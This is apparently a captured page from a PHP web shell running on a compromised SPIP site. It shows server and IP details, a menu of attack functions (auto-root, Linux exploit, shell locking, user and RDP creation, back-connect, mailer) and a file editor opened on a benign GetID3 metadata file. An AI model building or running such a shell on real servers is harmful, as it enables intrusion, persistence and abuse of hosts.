Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins-dist /
medias /
metadata /
[ HOME SHELL ]
Name
Size
Permission
Action
audio.php
1.59
KB
-rw----r--
html.php
1.29
KB
-rw----r--
image.php
1.59
KB
-rw----r--
swf.php
798
B
-rw----r--
video.php
1.45
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : video.php
<?php /** * GetID3 * Gestion des métadonnées de fichiers sonores et vidéos directement dans SPIP * * Auteurs : * kent1 (http://www.kent1.info - kent1@arscenic.info), BoOz * 2008-2016 - Distribué sous licence GNU/GPL * * @package SPIP\GetID3\Metadatas */ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Fonction de récupération des métadonnées sur les fichiers vidéo * appelée à l'insertion en base dans le plugin medias (inc/renseigner_document) * * @param string $file * Le chemin du fichier à analyser * @return array $metas * Le tableau comprenant les différentes metas à mettre en base */ function metadata_video($file) { $id3 = []; $meta = []; include_spip('lib/getid3/getid3'); $getID3 = new getID3(); $getID3->setOption(['tempdir' => _DIR_TMP]); // Scan file - should parse correctly if file is not corrupted $file_info = $getID3->analyze($file); /** * Les pistes vidéos */ if (isset($file_info['video'])) { $id3['hasvideo'] = 'oui'; if (isset($file_info['video']['resolution_x'])) { $meta['largeur'] = $file_info['video']['resolution_x']; } if (isset($file_info['video']['resolution_y'])) { $meta['hauteur'] = $file_info['video']['resolution_y']; } if (isset($file_info['video']['frame_rate'])) { $meta['framerate'] = $file_info['video']['frame_rate']; } } if (isset($file_info['playtime_seconds'])) { $meta['duree'] = round($file_info['playtime_seconds'], 0); } return $meta; }
Close